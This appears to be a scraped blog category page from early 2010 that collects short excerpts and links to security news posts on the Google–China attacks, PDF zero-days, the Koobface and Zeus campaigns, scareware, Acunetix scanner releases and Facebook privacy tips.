Information Filled Under ‘Web Service Security’ Category
Since last week Google disclosed some facts about the attacks against Gmail accounts of Chinese human rights activists and decided to review the feasibility of doing business in China everybody was wondering just what kinds of exploits were used in attack. It was clear that the recently patched Adobe Reader vulnerability described in APSB10-02 was the prime candidate for the attack, since the vulnerability has not been patched when the attacks occurred in mid December. Recent examples of PDF exploits which are well documented in ISC handler’s diaries show just how complex the attacks can be
Go here to see the original:
IE zero day exploit prime suspect in Google attacks
UPDATED, Friday, 15, 2010: The gang continues rotating the campaigns by targeting different brands. Over the 24 hours they’ve spamming the well known ” Notice of Underreported Income ” theme this time targeting HM Revenue and Customs (HMRC) , and have also introduced new portfolios of typosquatted domains next to changing the client-side exploits serving iFrame embedded on each and every page
See more here:
Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams
The next version of Acunetix Web Vulnerability Scanner (version 7), will contain a much more improved HTTP stack. While testing, we wanted to test the new HTTP stack on as many sites as possible to make sure we didn’t introduce any bugs.
Go here to read the rest:
Statistics from the top 1,000,000 websites
As already discussed by Mike , malware authors love to innovate when it comes to persistence and hiding their nefarious creations from detection, and although most of the schemes are not unknown to analysts, they still show that malware authors are constantly on the prowl and evolving their techniques. The example I have is of yet another registry-centric malware which by the nature of its construction has several advantages to defeating naive security software. The sample, detected as Troj/RegExec-A , is essentially a multi-component threat of sorts comprising of at least 3 components (Dropper/installer, Payload and Loader.) The dropper or installer component sets up the registry key and possibly some default payload and then installs the Loader component to be auto-launched by any number of autorun methods.
Continue reading here:
Registered malware
An updated build of Acunetix WVS Version 6.5 has been released with a number of new security checks and bug fixes. New security checks: Test for File Upload IIS bug filename.asp;.jpg Test for WP-Forum 2.3 vulnerabilities JBoss rmi ping (network script) Bug Fixes: Bugfix: Modified forms notifications from CSA Bugfix: CSA: Workaround for window.open with null parameters Fixed: In some specific scenarios the scheduler queue was restarting on its own Fixed: Node was not expanding automatically when manually adding a new logout link in the LSR How to upgrade to build 20100111: On starting up Acunetix WVS, a pop up window will automatically notify you that a more recent build is available for download. To download the latest build, navigate to General > Program Updates node in the Tools explorer, and click on Download and Install new build.
Excerpt from:
Acunetix WVS Version 6.5 build 20100111 released
UPDATED: Sunday, January 10, 2010 – The post has been updated with the latest domains spammed within the past 24 hours. UPDATED: Saturday, January 09, 2010 – The post has been updated with the latest domains spammed within the past 24 hours. The spam campaign is ongoing
Continued here:
Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware
The following ten posts have been featured due to their insightful content, comprehensiveness of the topic covered, and due to plain simple exclusivity in the time of publishing, and not necessarily based on page views. Thank you for being a regular reader of my personal blog. Feel free to subscribe to my RSS feed , keep track of my posts at ZDNet’s Zero Day , or follow me on Twitter
See the original post here:
Top Ten Must-Read DDanchev Posts For 2009
The end of the year naturally means a rush to come up with ‘best of the best’ top lists consisting of your finest content. However, based on personal observations, during the holidays season the short attention span of the average reader becomes even shorter with everyone looking forward to taking a well-deserved break. Therefore, the first working week of the new year appears to be the perfect moment to summarize some of my most insightful posts/analysis published at ZDNet’s Zero Day for 2009
Go here to read the rest:
Top Ten Must-Read Posts at ZDNet’s Zero Day for 2009
The following is a brief summary of all of my posts at ZDNet’s Zero Day for December, 2009. You can also go through previous summaries , as well as subscribe to my personal RSS feed , Zero Day’s main feed , or follow all of ZDNet’s blogs on Twitter . 01
Read more:
Summarizing Zero Day’s Posts for December
Marco commented that the CSS history hack doesn’t work with hidemyass.com. Never having been there, I found myself clicking around on their site to find that it’s yet another CGI proxy. So after a few minutes of playing around here is the list of problems or potential problems I have with hidemyass.com and most of the the sites that are similar
The rest is here:
Anonymous Proxy Woes
I apologize ahead of time for whomever first sent me this – it’s been so long now that I have long since lost the original email. But at some point a few years ago someone sent me a small snippet of JavaScript that could cause a page to be replaced by another page in such a way that if you looked at the URL bar, it didn’t matter because after you looked at it – a few seconds later – it would be replaced by the evil site. Well, today I spent a few minutes toying around with other potential uses for that same code
See the article here:
Popup & Focus URL Hijacking
Oops, they did it again – the Koobface gang, which is now officially self-describing itself as Ali Baba and the 40 Thieves LLC, has not only included a Koobface-themed — notice the worm in the name — background on Koobface-infected hosts, but it has also included a “Wish Koobface Happy Holidays” script — last time I checked there were 10,000 people who clicked it — followed by the most extensive message ever left by the gang, which is amusingly attempting to legitimize the activities of the gang. In short, the message with clear elements of PSYOPS, attempts to position the Koobface worm as a software, where the new features are requested by users, and that by continuing its development, the authors are actually improving Facebook’s security systems. For the record, the Koobface botnet itself is only the tip of the iceberg for the malicious activities the group itself is involved in
Here is the original post:
The Koobface Gang Wishes the Industry "Happy Holidays"
Since first releasing detection (2 days ago) for Troj/JSRedir-AK SophosLabs have seen thousands of websites affected by it. Since blogging yesterday we have seen a few minor variants and have had to update the our detection. One of the updates has been to detect the malicious script when appended to HTML files within script tags as well as being appended to JavaScript files
View original post here:
More on Troj/JSRedir-AK
Last week, Josh Kirkwood, Network Engineer at Blue Square Data Group Services Limited, with whom I’ve been keeping in touch regarding the blackhat SEO activity courtesy of the Koobface gang, and actual Koobface botnet activity that’s been taking place there for months , pinged me with an interesting email – ” Riccom are now gone ” ( AS29550 ). He also pinged the folks at hpHosts in response to their posts once again emphasizing on the malicious activity taking place there . Since I’ve been analyzing Riccom LTD activity in the context of “in-the-wild” blackhat SEO campaigns launched by the Koobface gang, followed by establishing direct Koobace botnet connections, as well as sharing data with Josh, Riccom LTD clearly deserves a brief
Good traditions are not meant to be broken, in particular the “Diverse Portfolio of Fake Security Software” series. And with scareware losses to customers already (conservatively) estimated at $150 million , combined with the overwhelming evidence of scareware becoming the monetization method of choice for the majority of cybercriminals gathered throughout the entire year – in 2010 we’ll see the peak of a fully matured business model that’s offering one of the highest payout rates within the underground marketplace. How can this underground business model be undermined
Follow this link:
A Diverse Portfolio of Fake Security Software – Part Twenty Four
I took a few minutes today to update the Master Recon Tool to include both the default Firefox preferences and the smbenum (enumeration of programs in Internet Explorer). This isn’t a big deal or anything, but it’s more that I think people aren’t really clued into all the stuff that can leak from a browser
Visit link:
Mr-T smbenum and Firefox userprefs
Security tips related to safety using Facebook can be found in the following links: Sophos's – Best Practices for Facebook security http://www.sophos.com/security/best-practice/facebook/ QUOTE: ID fraudsters target Facebook and other social networking sites to harvest information about you. Here's how we recommend you set your Facebook privacy options to protect against online identity theft. * Adjust Facebook privacy settings to help protect your identity * Read the Facebook Guide to Privacy * Think carefully about who you allow to become your friend * Show “limited friends” a cut-down version of your profile * Disable options, then open them one by one Facebook – Guide to Privacy http://www.facebook.com/privacy/explanation.php
Continue reading here:
Sophos’s – Best Practices for Facebook security
One of the ISC handlers shares some worthwhile training on the importance of security training. It's important to teach children safety as the Internet is a dangerous environment when it comes to email, web links, and malware.
Go here to read the rest:
ISC Security Awareness education for Youth
Please be careful with all PDF files, keep AV protection updated, and look for future Adobe releases which will address this issue. I usually keep JS off unless it's required to fill out a PDF form
See original here:
Adobe PDF Reader – Zero Day JavaScript attacks circulating in the wild
We read with interest about yet another PDF redaction snafu . In this case it was the attorney of TJX / 7-11 hacker Albert Gonzales, who posted an indictment that was redacted digitally and posted online as a PDF file — making it trivial to recover the original unredacted text. Last week the US Travel Security Authority (TSA) sacked 5 persons for posting a digitally “redacted” security guideline document online.
Excerpt from:
How Not To Redact Confidential Information